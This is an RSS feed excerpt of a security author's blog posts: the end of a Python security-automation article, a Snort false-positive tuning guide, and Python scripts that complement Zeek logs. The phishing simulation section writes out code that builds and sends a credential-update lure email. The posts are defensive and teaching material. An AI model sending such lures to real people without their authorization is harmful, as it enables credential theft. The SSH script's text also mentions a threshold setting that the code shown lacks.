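&lt;p&gt;On the sample this raises exactly two alerts, both for 198.51.100.7, and stays quiet for alice, whose single typo followed by a key login is normal. To run it live, keep parse_line and the window logic and feed them from tailer.follow as in the snippet above, so each new line updates the per-source state instead of re-reading the whole file.&lt;/p&gt;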

&lt;h2&gt;
  
  
  (5) Conducting phishing simulations
&lt;/h2&gt;

&lt;p&gt;We can finish with a fun way (don’t tell Facebook, Google, et al.) to test your users: automated phishing simulations that are less time-consuming and easier to manage than hand-crafted campaigns. Only run them against people and domains you have written authorization to test, and send them from infrastructure you control; an unsanctioned simulation is indistinguishable from a real attack to everyone who receives it.&lt;/p&gt;

&lt;p&gt;I wrote a script that will generate and send simulated phishing emails automatically. One popular library for this task is PhishLabs, which provides a Python API for creating and sending simulated phishing emails.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;You can first install PhishLabs using pip:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;pip install phishlabs-api
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Generate and send a simulated phishing email using the below code:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;from phishlabs import PhishLabsAPI, PhishMessage
# Define the PhishLabs API key and secret
api_key = "YOUR_API_KEY"
api_secret = "YOUR_API_SECRET"
# Create a new instance of the PhishLabs API client
phishlabs = PhishLabsAPI(api_key, api_secret)
# Define the email message
message = PhishMessage(
    sender_name="John Doe",
    sender_address="johndoe@doe.com",
    recipient="admin@williambaptist.co.uk",
    subject="Important Account Update",
    html_body="&amp;lt;p&amp;gt;Dear William,&amp;lt;/p&amp;gt;&amp;lt;p&amp;gt;We need to verify your account information to prevent unauthorized access. Please click the following link to update your account details:&amp;lt;/p&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a href='williambaptist.co.uk/dodgylink'&amp;gt;Update Account&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;&amp;lt;p&amp;gt;Thank you,&amp;lt;/p&amp;gt;&amp;lt;p&amp;gt;John Doe&amp;lt;/p&amp;gt;"
)
# Send the email message
phishlabs.send_phish(message)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;This code will generate a simulated phishing email and send it to the specified recipient. You can modify the email content, subject, and recipient to meet your specific needs.&lt;/p&gt;
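&lt;p&gt;The following is an added example, not code from the article or from PhishLabs, that builds the same simulated message with only Python’s standard library so you can see exactly what goes out and test it offline. It adds two things a real simulation needs: an HMAC-based per-recipient tracking token in the landing-page link, so clicks can be attributed without anyone being able to forge a colleague’s token, and a hard check that the recipient is inside the authorized scope. The secret key, the scope, the landing page, the X-Phish-Simulation header name and the relay host are all placeholders to replace.&lt;/p&gt;

```python
import hashlib
import hmac
import smtplib
from email.message import EmailMessage
from email.utils import formataddr

# Placeholders for this example: use a random secret, your own authorized target domain,
# your own landing page and a relay you control. Nothing here contacts a real server.
CAMPAIGN_KEY = b"replace-with-a-random-32-byte-secret"
AUTHORIZED_DOMAINS = {"williambaptist.co.uk"}
LANDING_PAGE = "https://williambaptist.co.uk/dodgylink"

def tracking_token(campaign_id, recipient):
    """Per-recipient click token. An HMAC over (campaign, recipient) means a token cannot be
    guessed or derived from another user's token, so click reports cannot be spoofed."""
    message = f"{campaign_id}:{recipient.lower()}".encode()
    return hmac.new(CAMPAIGN_KEY, message, hashlib.sha256).hexdigest()[:16]

def verify_token(campaign_id, recipient, token):
    """Check a token from a landing-page hit in constant time."""
    return hmac.compare_digest(tracking_token(campaign_id, recipient), token)

def build_phish(campaign_id, recipient, sender_name="John Doe", sender_address="johndoe@doe.com"):
    """Build the simulated phishing email for one recipient; refuses out-of-scope addresses."""
    domain = recipient.rsplit("@", 1)[-1].lower()
    if domain not in AUTHORIZED_DOMAINS:
        raise ValueError(f"{recipient} is outside the authorized scope for this simulation")
    link = f"{LANDING_PAGE}/{campaign_id}/{tracking_token(campaign_id, recipient)}"
    msg = EmailMessage()
    msg["From"] = formataddr((sender_name, sender_address))
    msg["To"] = recipient
    msg["Subject"] = "Important Account Update"
    # Assumed convention: a custom header so your own mail gateway can be told to let the
    # simulation through, and so incident responders can recognise it afterwards
    msg["X-Phish-Simulation"] = campaign_id
    msg.set_content(
        f"Dear {recipient.split('@')[0]},\n\n"
        "We need to verify your account information to prevent unauthorized access.\n"
        f"Please use the following link to update your account details:\n\n{link}\n\n"
        f"Thank you,\n{sender_name}\n"
    )
    return msg

def send_phish(msg, relay_host, relay_port=25):
    """Hand the message to an SMTP relay you control; never send through a third party's server."""
    with smtplib.SMTP(relay_host, relay_port) as smtp:
        smtp.send_message(msg)

if __name__ == "__main__":
    mail = build_phish("2023-06-drill", "admin@williambaptist.co.uk")
    print(mail.as_string())   # review the exact message before calling send_phish(mail, "mail.internal")
```

&lt;p&gt;The landing page only needs to recover the campaign id and token from the path and call verify_token against its recipient list; because the token is keyed, a user who shares their link cannot cause a click to be logged against anyone else.&lt;/p&gt;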

&lt;p&gt;In this article, I have showcased five different tasks that cybersecurity analysts often perform and provided code examples for automating each task using Python. By automating these tasks, cybersecurity analysts can save time and improve the accuracy of their work, allowing them to focus on more complex and strategic cybersecurity challenges. This article’s intention is to provide you with a good starting point for your own automation projects. Python is a powerful and versatile language as I hope I’ve shown you today!&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>ai</category>
      <category>python</category>
    </item>
    <item>
      <title>Snort IDS: How to Avoid False Positives</title>
      <dc:creator>William Baptist</dc:creator>
      <pubDate>Tue, 09 May 2023 23:21:04 +0000</pubDate>
      <link>https://dev.to/baptistsec/snort-ids-how-to-avoid-false-positives-126m</link>
      <guid>https://dev.to/baptistsec/snort-ids-how-to-avoid-false-positives-126m</guid>
      <description>&lt;p&gt;Snort is one of the most popular and widely used open-source intrusion detection systems (IDS) in the world. In this article, I’ll show some of the most effective ways to avoid false positives in Snort.&lt;/p&gt;

&lt;h2&gt;
  
  
  Fine-tune rules
&lt;/h2&gt;

&lt;p&gt;Snort relies on rules to detect and alert on potential intrusions. However, not all rules are created equal: some are too general for your traffic and some fire on behaviour that is perfectly normal in your environment, and both produce false positives. To avoid them, fine-tune rules to match the specific needs of your network. This can involve rate-limiting noisy rules (in Snort 2.9 the rule-level threshold keyword is deprecated in favour of detection_filter inside rules and event_filter entries in threshold.conf), disabling rules that are causing false positives, or writing custom rules that are more tailored to your environment.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Adjust the threshold of a rule to make it more or less sensitive. For example, if a rule fires on every packet of a legitimate vulnerability scanner, an event_filter of type limit with count 1 and seconds 60 reports the first hit per source and drops the repeats for the rest of the minute, so you still see that it happened without the flood.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Disable a rule that is causing too many false positives. For example, if a rule is triggering alerts for benign activity that you cannot scope down, it may be better to disable the rule altogether (comment it out in the rules file, or list its SID in disablesid.conf if you manage rules with PulledPork), and record why, so nobody re-enables it blindly.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Create a custom rule that is more specific to your environment. For example, if a rule that matches only on a content string triggers on an internal application, a custom rule that also pins the direction ($EXTERNAL_NET -&amp;gt; $HOME_NET), the destination port and flow:to_server,established will match the attack traffic and ignore yours.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Use multiple data sources
&lt;/h2&gt;

&lt;p&gt;Snort itself only inspects network packets, whether sniffed live or read from a pcap, so the other data sources have to come from alongside it: host logs, endpoint telemetry, DNS and proxy logs, and flow records. By cross-referencing Snort alerts against these, administrators can quickly decide whether an alert is real. For example, if Snort triggers an alert based on network traffic, check the system logs of the destination host to see whether any other activity occurred at the same time that could explain the alert.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Cross-reference network traffic with system logs to determine if an alert is a false positive. For example, if Snort triggers an alert for a particular IP address, administrators can check system logs to see if that IP address is associated with legitimate traffic or malicious activity.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Combine network traffic data with endpoint data to identify potential threats. For example, if Snort triggers an alert for suspicious traffic, administrators can check the endpoint associated with that traffic to determine if it is a false positive or a potential security incident.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Utilize whitelisting
&lt;/h2&gt;

&lt;p&gt;In an IDS, whitelisting means telling Snort not to alert on traffic you already know is benign; in passive mode Snort blocks nothing, so this is purely about reducing alerts, not about letting traffic through. Snort provides suppress entries in threshold.conf (per signature, optionally restricted to a source or destination IP) and pass rules, which let matching traffic skip the alert rules entirely. By whitelisting known-good traffic, administrators can cut the number of false positives without editing the rule itself.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Suppress a specific signature for specific hosts, ports or protocols rather than whole rule sets. For example, if a vulnerability scanner you run triggers a port-scan signature, a suppress entry for that sig_id tracked by_src for the scanner’s IP silences it without hiding the same signature when it fires from anywhere else.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Whitelist traffic from trusted sources with care. For example, if traffic from a particular IP address is known to be safe, it can be covered by a pass rule, but a pass rule for a whole host also hides that host on the day it is compromised, so scope whitelists to the narrowest signature, port and direction that removes the noise.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Implement anomaly detection
&lt;/h2&gt;

&lt;p&gt;Anomaly detection is the process of identifying and alerting on activity that is outside normal behaviour. It complements signature rules rather than replacing them: a baseline of what is normal on your network lets you triage Snort alerts by how unusual the surrounding traffic is, and it catches things no signature covers. For example, if Snort triggers an alert for a type of traffic that is never normally seen on the network, that context should raise the alert’s priority, while the same alert inside a well-known, baselined flow is more likely a false positive and can be investigated later.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Use statistical or machine-learning models, outside Snort itself, to score how far traffic deviates from normal. For example, if Snort fires on a connection to a host your network has never talked to, from a client that normally only speaks to internal servers, the anomaly score supports treating it as a potential incident rather than a false positive.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Create baselines for normal network activity (which hosts talk to which, on which ports, how much, at what time of day) and alert on deviations from the baseline. For example, an alert for traffic that fits the baseline can be deprioritised, while one that falls outside it is investigated further to determine whether it is a false positive or a potential security incident.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Regularly review and update rules
&lt;/h2&gt;

&lt;p&gt;Networks are constantly changing, and Snort rules must be regularly reviewed and updated to ensure they are effective and not causing false positives. This can involve reviewing logs to see which rules are triggering the most alerts, evaluating whether certain rules are still necessary, and adjusting thresholds to reduce false positives.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Review Snort logs to determine which rules are triggering the most alerts. For example, if a particular rule is causing a high number of false positives, it may need to be adjusted or disabled.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Evaluate whether certain rules are still necessary or relevant. For example, if a rule is triggering alerts for traffic that is no longer used on the network, it may be unnecessary and can be disabled.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Adjust thresholds and other settings based on changes in network traffic or security threats. For example, if a new type of malware is discovered, rules may need to be updated or thresholds adjusted to better detect that malware, and a suppression added during an old incident may no longer be appropriate.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
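&lt;p&gt;The following is an added example, not from the original article, that turns the review step above into a script: it parses Snort’s alert_fast output, ranks signatures by how often they fire and by source, and writes out candidate threshold.conf entries (Snort 2.9 syntax) for the two tuning actions described earlier, a suppress for a signature/known-good-source pair and an event_filter rate limit for a noisy signature. The alert lines and local rule SIDs are constructed for the example; the known-good source list is something you maintain yourself.&lt;/p&gt;

```python
import re
from collections import Counter, defaultdict

# Matches the Snort 2.9 alert_fast format:
#   06/04-02:00:01.000000  [**] [1:1000001:1] MSG [**] [Classification: ...] [Priority: 3] {TCP} SRC:PORT -> DST:PORT
# Groups: gid, sid, rev, message, protocol, source address, destination address (ports dropped)
ALERT_RE = re.compile(
    r"\[\*\*\] \[(\d+):(\d+):(\d+)\] (.*?) \[\*\*\].*?\{(\w+)\} (\S+?)(?::\d+)? -> (\S+?)(?::\d+)?$"
)

def _sample_alert(ts, sid, msg, src, dst, prio=3):
    return (f"06/04-{ts}  [**] [1:{sid}:1] {msg} [**] [Classification: Misc activity] "
            f"[Priority: {prio}] {{TCP}} {src} -> {dst}")

# Constructed alert file: a local rule that fires on every nightly backup transfer (pure noise
# from one known host) and a local rule that fired twice on real outbound connections to TCP/4444.
SAMPLE_ALERTS = "\n".join(
    [_sample_alert(f"02:00:{i:02d}.000000", 1000001, "LOCAL backup rsync to NAS",
                   "192.0.2.50:873", f"192.0.2.{20 + i}:40001") for i in range(12)]
    + [_sample_alert("03:10:00.000000", 1000002, "LOCAL outbound to TCP/4444",
                     "192.0.2.30:50001", "198.51.100.7:4444", prio=1),
       _sample_alert("03:10:05.000000", 1000002, "LOCAL outbound to TCP/4444",
                     "192.0.2.31:50002", "198.51.100.7:4444", prio=1)]
)

def summarize(alert_text):
    """Count alerts per (gid, sid) and per source address within each signature."""
    by_sid = Counter()
    sources = defaultdict(Counter)
    messages = {}
    for line in alert_text.splitlines():
        m = ALERT_RE.search(line)
        if not m:
            continue
        gid, sid, _rev, msg, _proto, src, _dst = m.groups()
        key = (int(gid), int(sid))
        by_sid[key] += 1
        sources[key][src] += 1
        messages[key] = msg
    return by_sid, sources, messages

def suggest_tuning(alert_text, known_good_sources, noisy_threshold=10):
    """Emit threshold.conf lines (Snort 2.9 syntax) for review, noisiest signature first:
    a suppress for each signature/known-good-source pair, and a rate limit for any signature
    that fired noisy_threshold times or more, so one source cannot flood the console."""
    by_sid, sources, _messages = summarize(alert_text)
    lines = []
    for (gid, sid), count in by_sid.most_common():
        for src in sources[(gid, sid)]:
            if src in known_good_sources:
                lines.append(f"suppress gen_id {gid}, sig_id {sid}, track by_src, ip {src}")
        if count >= noisy_threshold:
            lines.append(f"event_filter gen_id {gid}, sig_id {sid}, type limit, "
                         f"track by_src, count 1, seconds 60")
    return lines

if __name__ == "__main__":
    by_sid, sources, messages = summarize(SAMPLE_ALERTS)
    for key, count in by_sid.most_common():
        top = sources[key].most_common(1)[0][0]
        print(f"{count:5d}  [{key[0]}:{key[1]}] {messages[key]}  top source: {top}")
    print("\n".join(suggest_tuning(SAMPLE_ALERTS, known_good_sources={"192.0.2.50"})))
```

&lt;p&gt;Treat the output as a review queue, not as configuration to deploy: a suppress for a source address hides that signature from that host entirely, including the day it is compromised, and a type limit filter still lets the first event through but drops repeats for the window. Snort 3 expresses the same two actions as entries in the suppress and event_filter tables in snort.lua, with the same gid, sid, track, count and seconds fields.&lt;/p&gt;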

&lt;p&gt;False positives are a common challenge with Snort and other IDS, but there are several effective ways to reduce them. By fine-tuning rules, using multiple data sources, utilizing whitelisting, implementing anomaly detection, and regularly reviewing and updating rules, administrators can maximize the effectiveness of Snort while minimizing the number of false positives triggered. Ultimately, this will lead to a more secure network and more efficient security operations.&lt;/p&gt;

</description>
      <category>snort</category>
      <category>ids</category>
      <category>cybersecurity</category>
      <category>python</category>
    </item>
    <item>
      <title>3 Simple Zeek Scripts to Boost Your Network Security</title>
      <dc:creator>William Baptist</dc:creator>
      <pubDate>Tue, 09 May 2023 23:19:09 +0000</pubDate>
      <link>https://dev.to/baptistsec/3-simple-zeek-scripts-to-boost-your-network-security-59d5</link>
      <guid>https://dev.to/baptistsec/3-simple-zeek-scripts-to-boost-your-network-security-59d5</guid>
      <description>&lt;p&gt;Zeek is a powerful network analysis framework that can provide you with incredible insight into what’s happening on your network. While Zeek provides a lot of powerful features, one of its greatest strengths is its ability to be extended and customized through the use of scripts.&lt;/p&gt;

&lt;p&gt;In this article, I’ll show you three Python scripts that complement Zeek. Zeek’s own scripts are written in the Zeek scripting language; what follows is plain Python that runs alongside a Zeek sensor, uses its logs as a source of hosts and indicators, and takes your network analysis to the next level:&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;strong&gt;(1) SSL Cert Expiration Checker&lt;/strong&gt;
&lt;/h2&gt;

&lt;p&gt;SSL certificates are an essential component of securing online communication, but they have a limited lifespan. If a certificate expires, clients start rejecting it and users learn to click through the warning, which is exactly what a real man-in-the-middle needs. The SSL Cert Expiration Checker script connects to each host, checks the expiration date of the certificate it presents and alerts you when it is about to expire; the server_name column of Zeek’s ssl.log is a convenient source for the list of hosts to check.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;import datetime
import ssl
import socket

# Define a function to check the expiration date of an SSL certificate for a given domain
def check_cert_expiry(domain):
    context = ssl.create_default_context()
    conn = context.wrap_socket(socket.socket(), server_hostname=domain)
    conn.connect((domain, 443))
    cert = conn.getpeercert()
    conn.close()
    exp_date = datetime.datetime.strptime(cert['notAfter'], '%b %d %H:%M:%S %Y %Z')
    days_left = (exp_date - datetime.datetime.now()).days
    if days_left &amp;lt; 30:
        print(f"The SSL certificate for {domain} expires in {days_left} days. Renew it as soon as possible.")

# Replace "williambaptist.co.uk" with your own domain or list of domains to check
check_cert_expiry("williambaptist.co.uk")
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Like all these scripts this can be easily customized to meet your needs. For example, you can integrate it with email notifications or remote file writing.&lt;/p&gt;
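&lt;p&gt;Here is an added example (mine, not from the original article) that does what the paragraph above only hints at: it reads Zeek’s own ssl.log and x509.log, so the expiry check runs entirely from the sensor’s logs without connecting to every host, and it reports which server addresses and SNI names each expiring certificate was actually seen on. It assumes the Zeek 4.1 or later column names (fingerprint in x509.log, cert_chain_fps in ssl.log, leaf certificate first); the two log excerpts are constructed for the example, trimmed to the columns used, with a fixed "now" of 2023-06-04 20:00 UTC.&lt;/p&gt;

```python
from collections import defaultdict

def _convert(zeek_type, raw):
    """Turn one Zeek TSV field into a Python value; '-' is unset, '(empty)' is an empty container."""
    if raw == "-":
        return None
    if raw == "(empty)":
        return []
    if zeek_type.startswith(("vector[", "set[")):
        return raw.split(",")
    if zeek_type in ("time", "interval", "double"):
        return float(raw)
    if zeek_type in ("count", "int", "port"):
        return int(raw)
    return raw

def parse_zeek_log(text):
    """Parse an ASCII Zeek log (the #separator/#fields/#types header form) into a list of dicts."""
    sep, fields, types, rows = "\t", [], [], []
    for line in text.splitlines():
        if line.startswith("#separator "):
            # Zeek writes the separator escaped, e.g. "\x09" for a tab
            sep = bytes(line.split(" ", 1)[1], "ascii").decode("unicode_escape")
            continue
        if line.startswith("#"):
            key, _, rest = line[1:].partition(sep)
            if key == "fields":
                fields = rest.split(sep)
            elif key == "types":
                types = rest.split(sep)
            continue
        values = line.split(sep)
        rows.append({name: _convert(t, raw) for name, t, raw in zip(fields, types, values)})
    return rows

def expiring_certs(ssl_text, x509_text, now, warn_days=30):
    """Join ssl.log to x509.log on the leaf certificate fingerprint (first entry of
    cert_chain_fps) and report leaf certs that expire within warn_days, together with
    every server address and SNI they were seen on."""
    certs = {row["fingerprint"]: row for row in parse_zeek_log(x509_text)}
    seen_on = defaultdict(set)
    for conn in parse_zeek_log(ssl_text):
        chain = conn["cert_chain_fps"] or []
        if chain:
            seen_on[chain[0]].add((conn["id.resp_h"], conn["server_name"] or "(no SNI)"))
    report = []
    for fp, places in seen_on.items():
        cert = certs.get(fp)
        if cert is None:
            continue
        days_left = (cert["certificate.not_valid_after"] - now) / 86400
        if warn_days > days_left:
            report.append({"fingerprint": fp, "subject": cert["certificate.subject"],
                           "days_left": int(days_left), "seen_on": sorted(places)})
    return report

# ---- constructed sample logs (trimmed to the columns used above) ----
def _zeek_log(path, fields, types, rows):
    header = ["#separator \\x09", "#set_separator\t,", "#empty_field\t(empty)", "#unset_field\t-",
              f"#path\t{path}", "#fields\t" + "\t".join(fields), "#types\t" + "\t".join(types)]
    return "\n".join(header + ["\t".join(r) for r in rows] + ["#close\t2023-06-04-20-10-00"])

NOW = 1685908800.0   # 2023-06-04 20:00:00 UTC, the "current time" for the sample
X509_LOG = _zeek_log("x509",
    ["ts", "fingerprint", "certificate.subject", "certificate.not_valid_after"],
    ["time", "string", "string", "time"],
    [[str(NOW - 300), "a1b2c3d4e5f6", "CN=shop.example", str(NOW + 10 * 86400)],
     [str(NOW - 200), "c3d4e5f6a1b2", "CN=mail.example", str(NOW + 200 * 86400)],
     [str(NOW - 300), "e5f6a1b2c3d4", "CN=Example Intermediate CA", str(NOW + 900 * 86400)]])
SSL_LOG = _zeek_log("ssl",
    ["ts", "id.orig_h", "id.resp_h", "server_name", "cert_chain_fps"],
    ["time", "addr", "addr", "string", "vector[string]"],
    [[str(NOW - 300), "192.0.2.10", "203.0.113.10", "shop.example", "a1b2c3d4e5f6,e5f6a1b2c3d4"],
     [str(NOW - 200), "192.0.2.11", "203.0.113.11", "mail.example", "c3d4e5f6a1b2"],
     [str(NOW - 100), "192.0.2.12", "203.0.113.10", "-", "a1b2c3d4e5f6,e5f6a1b2c3d4"]])

if __name__ == "__main__":
    for cert in expiring_certs(SSL_LOG, X509_LOG, now=NOW):
        print(f"{cert['subject']} ({cert['fingerprint']}) expires in {cert['days_left']} days, "
              f"seen on {cert['seen_on']}")
```

&lt;p&gt;Reading the logs catches certificates the connect-and-check approach misses: internal services nobody put on the list, hosts that only answer on odd ports, and connections without SNI (the third ssl.log row), which the join still attributes to the right certificate by fingerprint. Run it against the files under Zeek’s logs/current directory with the real current time in place of NOW.&lt;/p&gt;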

&lt;h2&gt;
  
  
  &lt;strong&gt;(2) Malware Traffic Detector&lt;/strong&gt;
&lt;/h2&gt;

&lt;p&gt;Detecting malware traffic is essential for securing your network, but it can be difficult to know where to start. The Malware Traffic Detector script reads a packet capture with pyshark and flags HTTP requests whose Host header matches a list of known malicious domains; the same check runs unchanged over the host column of Zeek’s http.log, which is the cheaper option on a busy sensor. When it detects a match, it prints an alert for the network administrator.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;import pyshark

# Define a function to detect potential malware traffic in a network capture file
def detect_malware_traffic(pcap_file):
    cap = pyshark.FileCapture(pcap_file)
    for pkt in cap:
        if pkt.highest_layer == "HTTP":
            # Replace "malicioussite.co.uk" with your own list of known malicious domains
            if "malicioussite.co.uk" in str(pkt.http.host):
                print(f"Malware traffic detected: {pkt}")
    cap.close()

# Replace "capture.pcap" with your own pcap file to analyze
detect_malware_traffic("capture.pcap")
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;The script matches only on the HTTP Host header, so for HTTPS traffic it sees nothing beyond what the SNI in Zeek’s ssl.log gives you, and it only knows the domains you list. It’s easy to extend with a larger blocklist, or with YARA rules over the response body, and to change how alerts are delivered to meet your needs.&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;strong&gt;(3) SSH Login Attempt Monitor&lt;/strong&gt;
&lt;/h2&gt;

&lt;p&gt;Monitoring SSH login attempts is essential for securing your network against brute-force attacks. The SSH Login Attempt Monitor script follows sshd’s messages in the systemd journal and counts failed login attempts per source IP address (Zeek’s ssh.log, with its auth_success and auth_attempts columns, gives the same view from the network side). When it sees multiple unsuccessful attempts from the same address, it prints an alert for the network administrator.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;import subprocess

# Define a function to monitor SSH login attempts and alert on suspicious activity
def monitor_ssh_login_attempts():
    cmd = "journalctl -f | grep sshd | awk '/Failed/{print $NF}'"
    proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
    while True:
        line = proc.stdout.readline().decode().strip()
        if line:
            print(f"Suspicious SSH login attempt detected: {line}")
        else:
            break

# Run the function to start monitoring SSH login attempts
monitor_ssh_login_attempts()
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;You can adjust the threshold parameter to change how many unsuccessful attempts are allowed before an alert is sent, or replace the print with whatever alerting your team uses. Note that a patient attacker rotating source addresses stays under any per-IP threshold, so it is worth counting failures per target user as well.&lt;/p&gt;

&lt;p&gt;These three scripts can give you powerful new ways to secure your network. They’re easy to customize and can be tailored to meet your specific needs. If you’re not already using Zeek, I would recommend it from a learning standpoint more than anything, especially since its logs are so easy to script against and play around with, as I’ve shown you in this article.&lt;/p&gt;

</description>
      <category>zeek</category>
      <category>cybersecurity</category>
      <category>network</category>
      <category>python</category>
    </item>
  </channel>
</rss>
